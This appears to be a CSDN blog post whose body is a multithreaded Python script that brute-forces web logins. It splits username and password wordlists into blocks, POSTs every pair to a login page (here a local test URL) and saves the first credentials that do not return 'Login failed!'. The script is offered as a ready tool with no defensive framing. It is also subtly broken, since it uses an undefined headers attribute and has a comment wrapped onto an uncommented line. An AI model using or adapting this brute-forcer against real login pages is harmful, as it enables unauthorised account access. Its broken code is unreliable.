Weak password issue in the background

最新推荐文章于 2024-05-24 15:17:40 发布
最新推荐文章于 2024-05-24 15:17:40 发布
阅读量101 收藏
点赞数 3
分类专栏: Python tools 文章标签: python
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_52717285/article/details/137881406
版权 
#!/usr/bin/python3
# -*- coding: utf-8 -*-
import os
import threading
import requests
# 分块大小
BLOCK_SIZE = 1000

# 列表分块函数
def partition(ls, size):
	return [ls[i:i+size] for i in range(0,len(ls),size)]
	
def BruteForceHttp():
	# 读取账号文件和密码文件并存入对应列表
	listUsername = [line.strip() for line in open("username")]
	listPassword = [line.strip() for line in open("passwords")]
	# 对账号列表和密码列表进行分块处理
	blockUsername = partition(listUsername, BLOCK_SIZE)
	blockPassword = partition(listPassword, BLOCK_SIZE)
	threads = []
	# 把不同的密码子块分给不同的线程去破解
	for sonUserBlock in blockUsername:
		for sonPwdBlock in blockPassword:
			# 传入账号子块和密码子块实例化任务
			work = ThreadWork(sonUserBlock,sonPwdBlock)
			# 创建线程
			workThread = threading.Thread(target=work.start)
			# 在threads中加入线程
			threads.append(workThread)
	# 开始子线程
	for t in threads:
		t.start()
	# 阻塞主线程,等待所有子线程完成工作
	for t in threads:
		t.join()


class ThreadWork:
	# 目标URL
	url = "http://127.0.0.1:5555/login.php"
	
	# 类的构造函数
	def __init__(self,username,password):
		self.username = username
		self.password = password
		
	# 根据传入的账户密码进行破解
	def run(self,username,password):
		data = {
			'username': username,
			'password': password,
		}
		# 显示正在尝试的数据
		print("username:{},password:{}".format(username,password))
		# 发送post请求
		response = requests.post(self.url,data=data,headers=self.headers)
		# 根据返回的内容中是否包含登录失败的提示来判断是否登录成功
		if 'Login failed!' in response.text:
			pass
		else:
			# 找到正确的账户密码后,就把账户密码显示出来并输出到result文件中,并
			让程序终止
			print("success!!! username: {}, password: {}".format(username, password))
			resultFile = open('result','w')
			resultFile.write("success!!! username: {}, password: {}".format(username, password))
			resultFile.close()
			# 程序终止,0表示正常退出
			os._exit(0)
	# 从传递进来的账户子块和密码子块中遍历数据
	def start(self):
		for userItem in self.username:
			for pwdItem in self.password:
				# 传入账户和密码数据进行破解
				self.run(userItem,pwdItem)
				
if __name__ == '__main__':
	BruteForceHttp()
無敗の草
关注
  • 3
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Thinking in Enterprise Java
09-28 3990
Thinking in EnterpriseJava by Bruce Eckel et. Al.Revision 1.1, 5-06-2003Please note this document isunder development and incomplete. Updates to this document can be found at http://
Enabling SSL or TLS in Oracle E-Business Suite Release 12
苏南生的CSDN博客
06-16 1万+
Enabling SSL or TLS in Oracle E-Business Suite Release 12 In This Document Section 1: IntroductionSection 2: Concepts and TerminologySection 3: Application Tier SetupSection 4: Database Tier Set
The Linux GCC HOWTO
刘松华-林散
05-15 1283
转自:http://www.faqs.org/docs/Linux-HOWTO/GCC-HOWTO.html The Linux GCC HOWTO Daniel Barlow Linux Documentation Project May 1999 This document covers how to set up the GNU C compiler and development li
iOS 各版本中的新特性(What's New in iOS)- 目录翻译完成
太阳火神的美丽人生
11-15 1万+
iOS 各版本中的新特性(What's New in iOS)- 目录翻译完成
Key Reinstallation Attacks: Forcing Nonce Reuse in WPA2
独行者103的专栏
05-08 3636
ABSTRACT 摘要 We introduce the key reinstallation attack. This attack abuses design or implementation flaws in cryptographic protocols to reinstall an already-in-use key. This resets the key’s associa...
How To Query And Change The Oracle Hidden Parameters In Oracle 10g
cnk45946的博客
10-11 532
个人总结环境 OSrhel5.4 x86 64DBCOL PRODUCT FORMAT A55 COL VERSION FORMAT A15 COL STATUS FORMAT A15 SE...
2022 综合英语慕课(大学英语二)最新满分章节测试答案(题库中自找具体题目)
热门推荐
m0_69148276的博客
05-15 5万+
Unit 1 Ethnic Identity 种族认同 Unit 1 单元测试 小提示:本节包含奇怪的同名章节内容 1、 问题:The desire for peace political differences. 选项: A:ascended B:transcended C:condescended D:descended 答案: 【transcended】 2、 问题:Which festival is held on the first full moon...
iOS 各版本中的新特性(What's New in iOS)
dongtinghong的专栏
03-28 1443
Introduction 查看文本打印 This document provides information about features that were introduced in different versions of iOS and that affect the development of iOS apps. This document descr
Weblogic-Weakpassword-Scnner
05-01
Weblogic-弱密码-Scnner 点安装请求您可以使用masscan扫描具有CIDR格式的ip范围masscan -iL ip.txt -oL 7001.txt -...效率比以前更高1.python spider.py Scand.txt 2.python brute.py 也可以与一起使用以自动部署战争包
Weak-Password.zip
07-14
压缩包包含了常见的弱口令用户名,弱口令密码。包含常见的服务ftp、telnet、mysql等。还有sql注入测试代码。
The strength of weak learnability.pdf
03-17
The strength of weak learnability.pdf
tomcat-weak-password-scanner
03-01
扫描tomcat弱口令
weak-password-detect
03-14
弱密码检测
【hackmyvm】Slowman靶机
woshicainiao666的博客
05-20 1805
发现/secretLOGIN/login.html为登录地址,根据账号密码登录发现一个zip,但是需要密码。在FTP中得到的账号,爆破一下SSH。上传linpeas.sh文件,报一下。SSH爆破无果,试试mysql。得到用户名和加密的密码。
python中用“*”运算符复制列表时子列表实际上引用的是同一个列表,列表和嵌套列表的坑
ThreeS_tones的博客
05-21 1157
当你修改了一个子列表的元素时,所有的子列表都会随之改变。因为他们实际上都是同一个子列表的引用。输出如下,可以看到每个子列表中的第5个元素相同,并没有实现从0.8-1.2分布。先看一个例子,我想改变load的子列表中第五个元素,从0.8-1.2分布。的时候,Python实际上。
Python编程从入门到实践》day36
m0_37565294的博客
05-22 1673
我们要编写一个名为“学习笔记”的Web应用程序,让用户能够记录感兴趣的主题,并在学习每个主题的过程中添加日志条目。django-admin startproject learning_log . # 新建一个名为learning_log的项目,末尾的句点让新项目使用合适的目录结构。运行命令ls,其输出表明Django有创建一个db.sqlite3.SQLite使用一种使用单个文件的数据库。# 包含4个文件(settings.py、urls.py、wsgi.py、__init__.py)
提取COCO 数据集的部分类
最新发布
qq_53682472的博客
05-24 638
若报错,pip install git+https://github.com/philferriere/cocoapi.git#subdirectory=PythonAPI。注意skimage用pip install scikit-image -i https://pypi.tuna.tsinghua.edu.cn/simple。安装pycocotools github地址:https://github.com/philferriere/cocoapi。实在不行的话,手动下载。
An SSL certificate in the certificate chain has been signed using a weak hash algorithm
07-28
- *1* *2* [SSL Certificate Signed using Weak Hashing Algorithm](https://blog.csdn.net/weixin_42369552/article/details/102589691)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值